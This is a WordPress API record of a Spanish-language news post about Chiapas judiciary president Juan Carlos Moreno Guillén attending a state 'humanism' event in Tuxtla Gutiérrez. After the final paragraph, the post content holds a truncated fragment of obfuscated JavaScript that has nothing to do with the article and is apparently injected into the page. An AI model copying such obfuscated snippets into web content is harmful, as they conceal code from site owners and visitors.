{"id":23016,"date":"2025-07-18T02:19:04","date_gmt":"2025-07-18T02:19:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23016"},"modified":"2025-07-18T02:19:05","modified_gmt":"2025-07-18T02:19:05","slug":"juan-carlos-moreno-guillen-asiste-a-las-jornadas-del-humanismo-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23016","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n asiste a las Jornadas del Humanismo en Chiapas"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"23017\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-1024x678.jpg\" alt=\"\" class=\"wp-image-23017\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228219-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"23020\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-1024x678.jpg\" alt=\"\" class=\"wp-image-23020\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228216-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"23019\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-1024x678.jpg\" alt=\"\" class=\"wp-image-23019\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-1536x1018.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228228.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"23018\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-1024x678.jpg\" alt=\"\" class=\"wp-image-23018\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228225-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"23021\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-1024x678.jpg\" alt=\"\" class=\"wp-image-23021\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000228222-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>17 de julio del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, y al secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez, en las Jornadas del Humanismo: el humanismo comienza contigo, realizadas en el domo del Fraccionamiento Real del Bosque, en Tuxtla Guti\u00e9rrez, Chiapas.<\/p>\n\n\n\n<p>En un acto que tiene como objetivo fomentar la cultura basada en el respeto, la inclusi\u00f3n y la igualdad de los derechos fundamentales de todas las personas, el magistrado presidente Moreno Guill\u00e9n reconoci\u00f3 la importancia del humanismo en la vida p\u00fablica, como parte fundamental en la consolidaci\u00f3n de una cultura de paz para las y los chiapanecos.<\/p>\n\n\n\n<p>Por lo que, desde el Poder Judicial del Estado, reafirmamos nuestro compromiso con la construcci\u00f3n de un Chiapas m\u00e1s justo para todas y todos, con el respeto y equidad como la base primordial en la construcci\u00f3n de un estado m\u00e1s humanista, donde la paz sea una realidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 17 de julio del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, y al secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez, en las Jornadas del Humanismo: el humanismo comienza contigo, realizadas en el domo del Fraccionamiento Real del Bosque, en Tuxtla &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23020,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23016","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23016","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23016"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23016\/revisions"}],"predecessor-version":[{"id":23022,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23016\/revisions\/23022"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23020"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23016"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23016"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23016"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}